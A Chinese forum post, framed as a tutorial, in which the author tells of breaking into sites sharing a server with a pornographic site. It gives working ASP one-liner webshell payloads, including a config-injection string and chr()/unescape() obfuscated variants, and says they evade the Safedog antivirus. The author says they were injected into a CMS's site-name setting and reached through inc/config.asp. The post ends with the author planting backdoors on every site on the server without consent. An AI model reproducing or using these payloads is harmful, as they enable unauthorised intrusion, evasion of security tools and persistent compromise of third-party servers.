web信息安全交流吧 关注:9贴子:16
  • 1回复贴,共1

我是如何渗透某情色网站的

只看楼主收藏回复

从事情的经过到现在差不多已经有一个月了,一个月前我发现了一个黄色网站.
事情的经过很离谱,怎么说呢.... 当时有人拿一个站跟我装逼,我当时就不爽了,这逼要是都让你装了我怎么装啊.于是我也准备黑掉他,主站肯定没啥戏,那就旁站喽,然后一看,
十个里面八个色站,渍渍渍~没想到你是这样的人.可是咱对黄色没站没啥思路啊,于是就研究了很久先是发现有个南方站~这不就来思路了.就对这个南方站下手了没到几分钟就拿到WEBshell了我就看权限,好小连跨站都不能,只能提权了,当然了也是非

这次必须打码~ 进到后台以后就想拿shell呗 这还不是稳稳的事啊~
马克思cms一般都是两种拿shell方法
第一种是自带的FCK编辑器利用解析漏洞
第二种是网站配置哪里写入闭合一句话然后打开inc/config.asp连接即可
我先尝试了一下FCK上传点结果发现我创建的1.asp成1_asp了
试了很多方法都死,然后我就放弃这条路了.为什么我不直接在网站配置里面插入一句话呢
因为这个方法风险太大,可是现在只能这么做了 我就去网上找了一个一句话闭合一句话来
"%><%execute(request("pass"))%><%' 写进网站名称里面然后访问www.xxx.com/inc/config.asp
***了,我怎么把他给忘记了.玩蛋了 已经玩坏了一个网站.不过运气算好旁站还有存在默认的后台的 于是这一次我就谨慎了,不能再这么玩了.就去网上找免杀的闭合一句话找了很多都没戏,当我绝望的时候想起来了为啥不自己写个免杀的啊,后来从网上找了一个闭合一句话,看了也一下....这....貌似没啥难度啊只是加个字符闭合起来啊.
下面随便说下啊~大牛跳过.
“%><%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("a"))%><ss=”
这是当时别人给我的一个闭合一句话说是免杀 我看着挺牛逼的,拿到安全狗里面看了一下被杀了。
心好累~这也不行啊,但是我翻我的马的时候发现我竟然也有这个一句话但是不一样而已
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("a"))%>
我的是这样的,他跟我说他的是闭合一句话,但是我看了一下只是加了两个字符啊,竟然这样的话我自己也是试试然后就把我自己珍藏多年的免杀一句话拿了出来
<%execute(unescape("eval%20request%28%22aaa%22%29"))%>然后我也尝试着闭合起来
"%><%execute(unescape("eval%20request%28%22aaa%22%29"))%><%'
拿到安全狗里面扫了一下
成功的过狗了~我就迫不及待的去尝试一下插入网站配置里面然后访问www.xxx.com/inc/config.asp
空白 说明插入成功了 赶紧连接发现一句话乖乖的躺在里面~
而且权限很大可以跨站修改修改 上传 ==
但是最终没有免杀的aspx大马没能提下服务器 很可惜
只好把所有的网站里面都上传我的马了
为了安全只能这么打码了~
恩~教程到这里结束了.感谢大家观看


来自Android客户端1楼2022-08-11 06:13回复
    大佬 膜拜


    IP属地:广东来自iPhone客户端2楼2023-04-08 03:53
    回复